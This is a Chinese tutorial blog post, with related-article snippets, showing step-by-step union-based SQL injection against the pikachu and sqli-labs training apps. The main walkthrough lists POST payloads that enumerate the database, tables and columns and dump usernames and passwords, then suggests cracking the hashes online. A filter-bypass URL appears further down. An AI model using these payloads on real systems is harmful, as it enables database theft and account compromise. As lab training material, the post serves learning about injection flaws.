不使用burp suite-SQL注入-union注入(联合查询)-pikachu之数字型注入(post)

pikachu之数字型注入(post)

下面输入内容均为Post data内容

id=3‘&submit=%E6%9F%A5%E8%AF%A2   ------报错

id=3 and 1=1&submit=%E6%9F%A5%E8%AF%A2   ---正常

id=3 and 1=2&submit=%E6%9F%A5%E8%AF%A2   ----报错

id=3 order by 3&submit=%E6%9F%A5%E8%AF%A2   ---报错

id=3 order by 2&submit=%E6%9F%A5%E8%AF%A2  --正常   证明可以查找的是两个字段

id=-3 union select 1,2&submit=%E6%9F%A5%E8%AF%A2    -----   负3表示隐藏

id=-3 union select user(),database()&submit=%E6%9F%A5%E8%AF%A2  ---获取当前用户和数据库名称

id=-3 union select version(),database()&submit=%E6%9F%A5%E8%AF%A2    --获取数据库版本

id=1 and 1=2 union select group_concat(‘<br/>‘,table_name),database() from information_schema.tables where table_schema=database()  &submit=%E6%9F%A5%E8%AF%A2        ----获取表名

id=1 and 1=2 union select group_concat(‘<br/>‘,column_name),database() from information_schema.columns where table_schema=database() and table_name=‘users‘ &submit=%E6%9F%A5%E8%AF%A2        ---获取字段(以表users举例)

id=1 and 1=2 union select group_concat(‘<br/>‘,username),group_concat(‘<br/>‘,password) from users&submit=%E6%9F%A5%E8%AF%A2      ---获取字段username,password

https://www.cmd5.com/    把密码复制到这个网站进行解密可以得到明文

原文地址:https://www.cnblogs.com/mrlpl/p/12302034.html

时间: 2024-11-02 17:54:31

不使用burp suite-SQL注入-union注入(联合查询)-pikachu之数字型注入(post)的相关文章

【sqli-labs】 less27 GET- Error based -All you Union&amp;Select Belong to us -String -Single quote(GET型基于错误的去除了Union和Select的单引号字符串型注入)

看一下过滤函数 看一下/s是什么东西 那直接通过大小写就可以绕过了 http://192.168.136.128/sqli-labs-master/Less-27/?id=0'%a0uNion%a0sElect%a01,2,%273 原文地址:https://www.cnblogs.com/superkrissV/p/8371847.html

注入技术--数字型注入

[实验目的] 1)理解SQL注入的原理 2)学习SQL注入的过程 [实验原理] 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句.比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,

sql 用union合并合并查询结果

合并操作与连接相似,因为他们都是将两个表合并起来的另一个表的方法,然而他们的合并方法有本质的区别, 合并是两个表的相加,连接时时两个表的相乘: 01 在合并中两个表原列的数量与数据类型必须相同:在连接中一个表的行可能与另一个表的行有很大的区别,结果表列可能来自第一个表,第二个表或者是两个表的都有: 02在合并中行的最大数量是和 在连接中行的最大数量是积 select name,sex from [user] union select chinese,english from score 使用un

SqlSever基础 union all 联合查询,简单的组合 两个查询结果拼在一起

镇场诗:---大梦谁觉,水月中建博客.百千磨难,才知世事无常.---今持佛语,技术无量愿学.愿尽所学,铸一良心博客.------------------------------------------ 1 base code 1 use master 2 drop database helloworld 3 4 5 --创建一个数据库 6 create database helloworld 7 8 9 10 --用helloworld1这个数据库 11 use helloworld 12 13

union all 联合查询

UNION 操作符用于合并两个或多个 SELECT 语句的结果集. 需要注意的是 UNION 内部的 SELECT 语句列的数量,数据类型,顺序都必须相同. 如果允许重复的值,就要使用 UNION ALL了. 原文地址:https://www.cnblogs.com/cjb1/p/9340740.html

渗透学习笔记--基础篇--sql注入(数字型)

环境:dvwa 1.7数据库:mysql dvwa的安全等级:medium 一.分析和查找注入点(1)知识点回顾如果上一篇有好好读过的同学应该知道,我们上一篇遇到的字符型注入.也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住.如果我们想要注入自己的payload(有效载荷)的话,则我们必须先闭合前面的单引号或者双引号,否则我们的数据始终会被当做成字符串来处理. 这种类型的注入点称为字符型注入点. (2)这次我们的把防御等级提升了一个层次,来逐步加强我们手工注入的能力以及开更多

Sql注入的分类:数字型+字符型

Sql注入: 就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.通过构造恶意的输入,使数据库执行恶意命令,造成数据泄露或者修改内容等,以达到攻击的目的.主要是由于应用程序对用户的输入没有进行严格的过滤而造成的. 一.万能密码 在说sql注入分类之前,先来看一下万能密码的构成原理.万能密码是由于某些程序,通过采用判断sql语句查询结果的值是否大于0,来判断用户输入数据的正确性造成的.当查询之大于0时,代表用户存在,返回true,代表登

pikachu-字符型注入(get) #手工注入

1.检测注入类型 http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2 #不报错 http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1'&submit=%E6%9F%A5%E8%AF%A2 #报错 http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?

如何判断是字符型注入还是整形注入

字符型注入和整形注入区别 通常 Sql 注入漏洞分为 2 种类型 数字型 字符型 其实所有的类型都是根据数据库本身表的类型所产生的,在我们创建表的时候会发现其后总有个数据类型的限制,而不同的数据库又有不同的数据类型,但是无论怎么分常用的查询数据类型总是以数字与字符来区分的,所以就会产生注入点为何种类型. 数字型判断 当输入的参 x 为整型时,通常 abc.php 中 Sql 语句类型大致如下: select * from <表名> where id = x 这种类型可以使用经典的 and 1=